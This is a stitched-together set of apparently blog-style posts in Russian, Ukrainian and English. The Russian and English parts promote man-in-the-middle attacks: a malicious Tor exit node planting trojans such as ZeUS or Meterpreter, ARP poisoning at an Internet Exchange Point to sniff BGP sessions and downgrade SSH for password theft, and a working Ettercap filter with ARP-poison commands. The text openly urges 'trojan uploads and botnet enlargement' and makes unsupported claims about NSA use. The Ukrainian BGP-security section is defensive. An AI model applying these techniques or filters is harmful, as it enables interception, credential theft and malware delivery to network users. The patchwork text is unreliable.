Скажу пару слов о концепции активной системы. До настоящего времени в сети витала идея перехвата проходящих данных через узлы tor. В этом случае система имеет пассивную концепцию сбора информации, и её оператор вынужден довольствоваться теми данными, которые попадут в их “сети”. Однако, о внутренних ресурсах сети tor можно получить куда больше информации, если для её сбора использовать концепцию активной системы мониторинга.
Обязательным условием для нормального обмена информацией с внешними интернет-ресурсами через exit node является наличие ответа от веб-сервера, который моя выходная нода должна в обязательном порядке доставить до tor-абонента. В противном случае, если через ноду идут только запросы к веб-серверам, остающиеся без ответа, можно понять, что имеет место чья-то DDoS атака.
Основная суть активной системы заключается в возможности организации MiTM-атаки: я могу перенаправлять пользователя на подконтрольный мне веб-ресурс или добавлять свой код в содержимое ответа с помощью фильтров Ettercap NG с целью спровоцировать утечку какой-либо ценной информации с компьютера клиента, в том числе произвести загрузку троянской программы или установить скрытый майнер.
Тема деанонимизации пользователя и описание её техник требуют отдельного времени, но можно сделать вывод, что ряд её техник могут помочь в получении информации об актуальных ресурсах. Задача нетривиальная, и подойти к её решению можно разными способами. В данном случае всё зависит от фантазии владельца exit node. Например, можно использовать техники социальной инженерии и спровоцировать (от имени администратора запрашиваемого ресурса) пользователя сети tor отправить какую-либо информацию о себе и посещённых ресурсах. В качестве альтернативного средства можно попытаться загрузить на компьютер пользователя сети tor какую-либо “полезную нагрузку”, например ZeUS, CarberP или Meterpreter.
Традиционные веб-технологии также могут помочь в решении данной задачи. Например, cookies, которые владельцы веб-сайтов используют для получения статической информации о посетителях. Необходимо отметить, что cookies обладают ограниченным временем жизни и, кроме того, пользователь может удалить их в любой момент. По этой причине разработчики идут на различные уловки, чтобы повысить время жизни и объём информации, хранимой в cookie-файлах.
Одним из способов является использования хранилища Flash, в таком случае информация хранится в LSO-файлах (local shared objects), которые схожи с cookie-файлами и тоже хранятся локально на компьютере пользователя. Кроме того, существует ещё более мощный инструмент для работы с cookies – JavaScript-библиотека evercookie. Данная библиотека предоставляет возможность создавать трудноудаляемые cookies путём использования одновременно обычных HTTP-cookie, LSO-файлов и HTML5.
И как ты понял, всю эту информацию можно извлечь активной системой мониторинга сети tor.
Более подробно обсудить со мной вопрос практического применения этого материала можно в личных сообщениях. Контактные данные указаны в соответствующем разделе этого сайта.
Однією з основних функцій сервісу моніторингу та аналітики BGP є моніторинг певних аномалій, які можуть призвести до інциденту, який ми б далі назвали або витоком маршруту BGP, або перехопленням BGP.
Обидва вони перенаправляють трафік третім сторонам, порівняно зі станом без аномалій, але по-різному. Протягом останніх кількох років було вкладено багато зусиль у вирішення цих проблем, але все ще існують непорозуміння щодо того, що є що і як різні інструменти допомагають вирішувати різні проблеми.
Ми почали збирати модель зв’язків BGP за кілька років до появи RFC 7908, намагаючись визначити, що таке витік маршруту BGP. Дві основні відмінності між цими подіями за часом були описані як:
Маршрути, перенаправлені через неправильні ASN/посилання (витоки маршруту), описані як типи 1-4 RFC 7908
Маршрути, перенаправлені на неправильні ASN (перехоплення), описані як типи 5 та 6 RFC 7908
Під час витоку маршруту BGP трафік, призначений для вашої мережі, найімовірніше, буде проходити неефективно, що може призвести до збільшення затримки мережі та втрати пакетів. Тим не менш, він майже напевно досягне вашої мережі, якщо немає критичного перевантаження мережі з якоїсь причини (наприклад, через злий намір зловмисника). Під час захоплення BGP трафік, призначений для вашої мережі, перенаправляється до третьої сторони та залишається там. Крім того, механізми створення таких аномалій також різні. Щоб створити витік маршруту, вам потрібно передати хороший маршрут невідповідному сусідньому інтернет-провайдеру. Щоб створити захоплення, вам потрібно або оголосити маршрут із підпрефіксом/точніше, з дійсним префіксом (щоб залучити весь трафік від інтернет-провайдерів, які отримали таке оголошення, з будь-яким AS_PATH), або створити оголошення маршруту зі стороннім префіксом з вашої мережі. Оскільки механізми створення аномалій маршрутизації різняться, механізми виявлення та запобігання/пом’якшення інцидентів повинні бути різними.
Щоб виявити причину витоку маршруту, вам потрібно з’ясувати зв’язок між кожним із двох підключених операторів та знайти такі BGP-маршрути (від колектора BGP), які порушують формальну модель Гао-Рексфорда. Для отримання додаткової інформації зверніться до “AS-зв’язків” CAIDA. Щоб виявити викрадання, вам потрібна достовірна інформація про те, які префікси належать яким інтернет-провайдерам, і в більшості випадків, коли з’являється незареєстрована пара префіксів ISP, створіть тривогу або вживіть заходів.
Для запобігання/пом’якшення викрадань існує два стандартні підходи в рамках єдиної системи перевірки походження префіксів. Ви можете зареєструвати об’єкт Route у своєму IRR або створити об’єкт ROA. Наша команда описала відмінності між цими підходами під час RIPE79. Однак спільне те, що вони обидва вказують, які префікси належать яким операторам (самими операторами) та намагаються блокувати маршрути від інтернет-провайдера з незареєстрованими префіксами (транзитними інтернет-провайдерами). Щоб запобігти/пом’якшити витоки чистих маршрутів, ми беремо участь у створенні політики відкритості BGP. Інший підхід — це блокування вузлів — блокування маршрутів з неочікуваними сусідами/провайдерами в AS_PATH. Проект ASPA IETF дещо стоїть осторонь від чистого запобігання перехопленням/витокам маршрутів, оскільки він більше стосується блокування поганих AS_PATH (випадків витоків маршрутів та перехоплень без/з поганою маніпуляцією AS_PATH).
ROA проти витоків маршрутів
Отже, чи безпечна ваша мережа, якщо ви впровадите підписання ROA та фільтрацію ROA? Ні, тому що без ASPA або будь-якого еквівалента, ROA сам по собі не зупинить витік маршрутів іншими. Ми сподіваємося, що тепер ви бачите, наскільки складною є ця проблема, де потрібні окремі підходи для забезпечення основи сучасної міждоменної маршрутизації – протоколу Border Gateway Protocol.
Підписання ROA проти фільтрації ROA
Ще одна поширена помилка пов’язана з ROA. В алгоритмах ROA є дві сторони: сторона підписання – оператор, який надає достовірну інформацію про префікси, якими він володіє; і є сторона фільтрації – транзитний оператор, який фільтрує погані маршрути відповідно до інформації, наданої стороною підписання.
Як оператор-заглушка (тобто AS лише з одним постачальником вище), ви обмежені в кількості способів впливу на кількість сторін фільтрації. Чим більше їх, тим безпечнішими будуть ваші префікси (тим менше регіонів постраждає, якщо зловмисник вирішить атакувати ваші префікси). Якщо ви вирішите підписати свої префікси, ви можете використовувати існуючу інфраструктуру фільтрації, яка лише зростатиме найближчим часом. Більше того, ми закликаємо вас робити саме це в будь-якому випадку, тобто незалежно від розміру мережі за вашим ASN.
Ця стаття все одно закінчиться попередженням: поточна інфраструктура фільтрації може бути недосконалою, а в деяких випадках ви не можете повернути свій трафік із ураженого регіону через обраний варіант максимальної довжини та фільтрацію ROA з боку вашого інтернет-провайдера.
Детальніше обговорити зі мною питання практичного застосування цього матеріалу можна в особистих повідомленнях. Контактні дані наведено у відповідному розділі цього сайту.
Ettercap NG – сетевой sniffer /interceptor/ logger для коммутируемых сетей (switched LAN). Программа использует ARP poisoning и “man-in-the-middle” методы нападения, чтобы перехватывать подключения между двумя хостами в реальном времени. Вы можете перехватить трафик между двумя хостами в сети интернет, используя MAC-based sniffing mode. Позволяет перехватывать SSH1, HTTPS и другие защищенные протоколы. В последнее время часто используется для реализации сценариев bgp route hijacking & traffic engineering при MiTM сценариях с майнинговыми пулами, воздействуя на механизмы глобальной маршрутизации трафика.
Позволяет расшифровывать пароли для следующих протоколов – TELNET, FTP, POP, RLOGIN, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, HALF LIFE, QUAKE 3, MSN, YMSG или как это говорят на профильных площадках «Сетевой инженер шатает bgp».
Перехват трафика Ettercap NG и как это работает?
Ettercap NG умеет подменять MAC-адрес шлюза на свой собственный в ARP-таблице целевого устройства. В результате, весь трафик, предназначенный для шлюза, направляется на атакующий компьютер:
Более подробно это выглядит так:
Ettercap NG отправляет поддельные ARP-пакеты, утверждая, что он является шлюзом.
Целевое устройство обновляет свою ARP-таблицу и начинает отправлять весь трафик на машину с Ettercap NG.
Ettercap NG перехватывает этот трафик и может его анализировать, модифицировать или перенаправлять.
Как вариант Ettercap NG может устанавливать себя в качестве промежуточного устройства между клиентом и сервером. Весь трафик, проходящий через это соединение, проходит через Ettercap NG.
Ettercap NG перехватывает соединение между клиентом и сервером.
Модифицирует пакеты таким образом, чтобы клиент и сервер думали, что общаются напрямую.
Ettercap NG может дешифровать и шифровать трафик, а также изменять его содержимое.
Как работать с Ettercap NG на точке обмена трафиком
Если запускать Ettercap NG в домашней сети – толку от этого будет мало, можно увидеть свой трафик и больше ничего. Так как же посмотреть вширь и увидеть нечто большее? На днях довелось мне поработать на одной из точек обмена трафиком, через которую крупные и малые провайдеры интернета и магистральные операторы связи бесплатно обмениваются трафиком друг с другом. Дело всё в том, что в таких точках пиринга оборудование каждого участника подключается в общий коммутатор, хотя обмен маршрутами происходит посредством bgp через route-сервер, как правило под управлением Bird или FRR, ранее этот софт назывался Quagga или Zebra кому как удобнее. Но включены то они все в один управляемый свич, а значит тут возможны варианты:
– <a> или ARP poisoning based sniffing, применяется для прослушивания трафика в коммутируемых локальных сетях второго уровня, а также для применения bgp route hijacking сценариев класса mitm. В данном случае я использовал сценарий arpoison, который модифицирует ARP-таблицы целевых маршрутизаторов, подключенных к точке обмена трафиком таким образом, что все кадры данных с выбранного source шли на мой ноут с Ettercap NG, а с этого ноута уже – на destination в пункт назначения на bgp-роутер участника точки обмена трафиком, как показано на рисунке.
Иными словами, с помощью этого метода прослушивания трафика я проанализировал трафик выбранных мной участников точки обмена Internet Exchange Point, в том числе выходящий за пределы главного коммутатора этого peering point. На основе этого метода, уже с версии 0.6.7 Ettercap NG реализован перехват (dissection) паролей протокола https. У меня получилось даже собрать пароли ssh версии 2, когда я подключил соответствующий фильтр ettercap -F etter.filter.ssh, который подменяет версию ssh-сервера с 1.99 (openssh-0.9.6, etc) на 1.51, поддерживающую только первую версию протокола ssh.
Однако, для реализации сценария arpoison, ettercap’у необходимо зафлудить сеть целой пачкой сгенерированных ARP-пакетов, но на современных управляемых коммутаторах уже есть средства, отлавливающие этот сценарий. С первой попытки сделать ARP-poison на коммутаторе точки обмена трафиком у меня не получилось, но со второй попытки, когда я добавил ложный IP-адрес, всё прекрасно сработало.
– <s>, IP based sniffing и <m>, MAC based sniffing – это варианты обычного пассивного прослушивания трафика локальной сети. Возможности такого перехвата пакетов очень ограничены, хотя меня впечатлило количество поддерживаемых протоколов при относительно небольшом размере программы.
Напихав нужные адреса ASBR роутеров, подключенных к точке обмена трафиком в source, destination или в оба сразу (я выбрал 192.168.0.10 в качестве source), выбирав метод прослушивания сети (я выбрал <a>), и попал в соответствующее окно:
И вот тут я и увидел все интересующие меня соединения, в том числе bgp-сессии, установленные между ASBR роутерами участников обмена трафиком и route-сервером площадки.
Для того, чтобы собрать пакеты с обновлениями bgp, делать не нужно вообще ничего =)) Наведя курсор на нужное мне соединение все данные bgp-сессии появлялись в нужной части экрана, и я сразу получил всё, что мне нужно =))
Нажав на другую кнопку мне сразу открылся новый диапазон возможностей, уверен, он и тебя впечатлит. Убийство соединений, хайджекинг, филтеринг, etc… Что ещё нужно для перехвата bgp-сессии и реализации MiTM сценария через route leaking? =)
На видео более подробно поговорим о traffic engineering и утечках маршрутов (route leaking) и к чему вообще всё это….
Вкусности Route Leaks & Traffic Engineering
Возможности программы Ettercap ng огромны, но я почти уверен, что они тебя не удовлетворят на все 100%. Ну что же, для твоих трафик-нижениринговых целей предусмотрены варианты в виде:
Написания плагинов, – ну тут все просто и понятно: не влезая в кишки ettercap’a, юзаешь плагинный интерфейс этой проги и делаешь нужный тебе компонент, который ты сможешь подгружать в программу всякий раз, когда тебе это нужно.
Возможность bind’ить локальный порт, с которым ettercap проассоциирует нужное тебе соединение, например по 179 порту. Это очень ценное свойство программы: ты сможешь заранее реализовать нужные тебе механизмы, воспроизвести которые в реальном времени обычными средствами весьма затруднительно =)) Проще говоря, влезать в чужие IRC-приваты и материться можно и руками, но если ты захочешь впарить кому-нибудь бекдор, проспуфив http или ftp, или сообщить какому-нибудь биржевому игроку, что его акции упали в цене в четыре раза, или же подменить некий криптомост, где плавают жирные киты на время своим мостом с нужными тебе смартконтрактами, такое свойство программы может оказаться весьма и весьма кстати =))
Хочется отметить, что вот так запросто подключиться в Ethernet или SFP порт коммутатора мне удалось только на точке обмена трафиком (Internet Exchange Point), однако, в реальной жизни на узле того или другого крупного телекоммуникационного оператора все соединения, как правило, упакованы в VPLS/EPIPE/EVPN каналы, и добраться до них новичку с первого раза будет не так то просто, но об этом мы поговорим уже в следующий раз.
Более подробно обсудить со мной вопрос практического применения этого материала можно в личных сообщениях. Контактные данные указаны в соответствующем разделе этого сайта.
Ettercap NG is an open-source comprehensive suite for man in the middle attacks and can be compiled on Linux, BSD, Mac OS X and Windows XP/10/11 and can work on wireless 802.11 and wired LANs. Ettercap NG has the ability to route traffic though itself using “Man in the Middle” attacks and then use filters to modify the data before sending it on to the Level3 or AT&T customers.
Ettercap NG can be extended by using filters and plug-ins, making it able to do all sorts of neat network tasks. Using filters is what the NSA and GCQH do with Ettercap NG. The easiest way to use Ettercap NG is on Windows 11 machine. The NSA and GCHQ prefer to use the Ettercap NG-0.7.3.
In this case I will show you how to compromise someone’s PC or mobile phone and have the images on web pages replaced by the Jolly Rogers.
Please feel free to use the skills learned from this paper to do many other useful tasks like on-line cryptocurrency exchange trojan uploads and botnet enlargement. The first thing you need to do is create an Ettercap NG filter. The sample source code below:
######################################################################
# #
# Jolly Pwned -- ig.filter -- filter source file #
# #
# By Irongeek. based on code from ALoR & NaGA #
# Along with some help from Kev and jon.dmml #
# http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833 #
# #
# This program is free software, you can redistribute it
# and/or modify it under the terms of the GNU
# General Public License as published by
# the Free Software Foundation,
# either version 2 of the License, or
# (at your option) any later version. #
# #
######################################################################
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src="http://www.irongeek.com/images/jollypwn.png" ");
replace("IMG SRC=", "img src="http://www.irongeek.com/images/jollypwn.png" ");
msg("Filter Ran.n");
}
The code should be pretty self explanatory to anyone who has done much coding before (it’s very much like C and other languages).
The # symbols are comments. The “if” statement tells the filter to only work on TCP packet from source port 80, in other words coming from a web server. This test may still miss some images but should get most of them. I’m also not sure about Ettercap’s order of operation with AND (&&) and OR (||) statements but this filter largely seems to work (I tried using parentheses to explicitly specify the order of operation with the Boolean operators, but this gave me compile errors).
The “replace” function replaces the first parameter string with the second. Because of the way this string replacement works it will try to mangle image tags and insert the picture you desire into the web page’s HTML before it returns it to the victim. The tags may end up looking something like the following:
The original image location will still be in the tag, but most web browsers should see it as a useless parameter. The “msg” function just prints to the screen letting us know that the filter has fired off.
Now that you sort of understand the basics of the filter lets compile it. Take the ig.filter source code listed above and paste it into a text file, then compile the filter into a .ef file using the following command:
etterfilter ig.filter -o ig.ef
As soon as filter is compiled you need to target the hosts you want to ARP poison and run the filter on:
TARGET SPECIFICATION There is no concept of SOURCE nor DEST. The two targets are intended to filter traffic coming from one to the other and vice-versa (since the connection is bidirectional).
TARGET is in the form MAC/IPs/PORTs. If you want you can omit any of its parts and this will represent an ANY in that part, e.g.
“//80” means ANY mac address, ANY ip and ONLY port 80 “/10.0.0.1/” means ANY mac address, ONLY ip 10.0.0.1 and ANY port
MAC must be unique and in the form 00:11:22:33:44:55
IPs is a range of IP in dotted notation. You can specify range with the – (hyphen) and single ip with , (comma). You can also use ; (semicolon) to indicate different ip addresses, e.g.
“10.0.0.1-5;10.0.1.33” expands into ip 10.0.0.1, 2, 3, 4, 5 and 10.0.1.33
PORTs is a range of PORTS. You can specify range with the – (hyphen) and single port with , (comma). e.g.
“20-25,80,110” expands into ports 20, 21, 22, 23, 24, 25, 80 and 110
NOTE: you can reverse the matching of the TARGET by adding the -R option to the command line. So if you want to sniff ALL the traffic BUT the one coming or going to 10.0.0.1 you can specify “./ettercap -R /10.0.0.1/”
NOTE: TARGETs are also responsible of the initial scan of the lan. You can use them to restrict the scan to only a subset of the hosts in the netmask. The result of the merging between the two targets will be scanned. remember that not specifying a target means “no target”, but specifying “//” means “all the hosts in the subnet.
So, if you wanted to target all hosts on the network you would use the following command:
ettercap -T -q -F ig.ef -M ARP // //
Be careful with the above command, having all of the traffic on a large network going though one slow computer can really bog down network connections. If you had a specific victim in mind, let’s say a host with the IP 192.168.22.47, you would use this command:
ettercap -T -q -F ig.ef -M ARP /192.168.22.47/ //
Here are what the command line option flags do:
-T tells Ettercap NG to use the text interface, I like this option the best as the more GUI modes are rather confusing. -q tells Ettercap NG to be more quiet, in other words less verbose. -F tells Ettercap NG to use a filter, in this case ig.ef that you compiled earlier. -M tells Ettercap NG the MITM (Man in the Middle) method you want to use, in this case ARP poisoning.
Once Ettercap NG is running you would get some output something like the following:
SSL dissection needs a valid ‘redir_command_on’ script in the etter.conf file Privileges dropped to UID 65534 GID 65534…
28 plugins 39 protocol dissectors 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services
Randomizing 4095 hosts for scanning… Scanning the whole netmask for 4095 hosts… * |==================================================>| 100.00 %
526 hosts added to the hosts list…
ARP poisoning victims:
GROUP 1 : 192.168.22.47 00:04:56:B8:70:AD
GROUP 2 : ANY (all the hosts in the list) Starting Unified sniffing…
Text only Interface activated… Hit ‘h’ for inline help Filter Ran.
Filter Ran.
Below you can see what the antionline.com and binrev.com web pages look like when the victim tries to view them after Ettercap NG filtering:
This filter does not seem to fire off for all images, it’s a little hit and miss. For more information on things, you can do Ettercap NG filters look at the sample code in the file “etter.filter.examples” that comes along with Ettercap NG.
On my box this file is located in /usr/share/ettercap/etter.filter.examples. Also check out Kev’s tutorial on Ettercap NG filters.
You can discuss the practical application of the tools described with me in more detail via private messages. Contact information is provided in the relevant section of this website.
